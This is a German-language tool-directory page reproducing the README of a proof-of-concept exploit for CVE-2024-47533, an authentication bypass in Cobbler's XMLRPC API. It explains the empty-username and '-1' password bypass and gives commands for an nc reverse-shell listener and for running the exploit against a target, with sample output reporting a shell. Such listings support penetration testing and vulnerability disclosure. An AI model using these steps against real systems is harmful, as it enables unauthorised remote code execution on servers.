Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-47533-PoC — Proof-of-Concept-Exploit für CVE-2024-47533, eine Authentifizierungsumgehung in der Cobbler-XMLRPC-API, die zu nicht authentifizierter Remote-Codeausführung und einer Reverse Shell führt. | Kitploit
Tools/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Authentifizierung & AutorisierungExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Proof-of-Concept-Exploit für CVE-2024-47533, eine Authentifizierungsumgehung in der Cobbler-XMLRPC-API, die zu nicht authentifizierter Remote-Codeausführung und einer Reverse Shell führt.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-47533 – Cobbler XMLRPC Authentifizierungsumgehung → Reverse Shell (Unauthentifizierte RCE)

📌 Zusammenfassung

Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2024-47533,
eine kritische Authentifizierungsumgehung in der XMLRPC-API von Cobbler, die zu unauthorisierter Remote-Codeausführung (RCE) führt.

Der Exploit nutzt den Fehler in der login()-Methode der XMLRPC-API aus, um die Authentifizierung zu umgehen und einen Reverse-Shell-Befehl über background_import() einzuschleusen.


⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke, Forschung und autorisierte Penetrationstests bestimmt.
Verwenden Sie es NICHT auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden.


🛠 Technische Details

  • Schwachstellentyp: Authentifizierungsumgehung → RCE
  • Betroffene Komponente: Cobbler XMLRPC-API
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine

Grundursache:
utils.get_shared_secret() gibt fälschlicherweise -1 zurück, aufgrund einer fehlerhaften Handhabung von Dateilesen im Binärmodus mit einer Kodierung, was eine Authentifizierung mit einem leeren Benutzernamen und -1 als Passwort ermöglicht.

Auswirkung:
Ein Angreifer kann:

  • Admin-Level-API-Zugriff erlangen
  • Beliebige Systembefehle in Cobbler-Vorlagen einschleusen
  • Eine Reverse-Shell auf dem Ziel starten

🚀 Verwendung

1️⃣ Repository klonen

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Listener einrichten

Auf Ihrem Angriffsrechner:

root@kitploit:~
nc -lvnp 4444

3️⃣ Exploit ausführen

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Beispiel:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Dateistruktur

root@kitploit:~
.
├── CVE-2024-47533.py  # Reverse-Shell-Exploit-Skript
└── README.md          # Dokumentation

📸 Beispielausgabe

root@kitploit:~
[*] Ziel: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Verbinde zu Cobbler...
[*] Authentifiziere...
[*] Führe Exploit aus...
[+] Exploit gesendet! Shell erhalten 🔥.

🧑‍💻 Autor

00xCanelo
GitHub-Profil


📚 Referenzen

  • NVD: CVE-2024-47533
  • Cobbler-Projekt GitHub
Tool herunterladen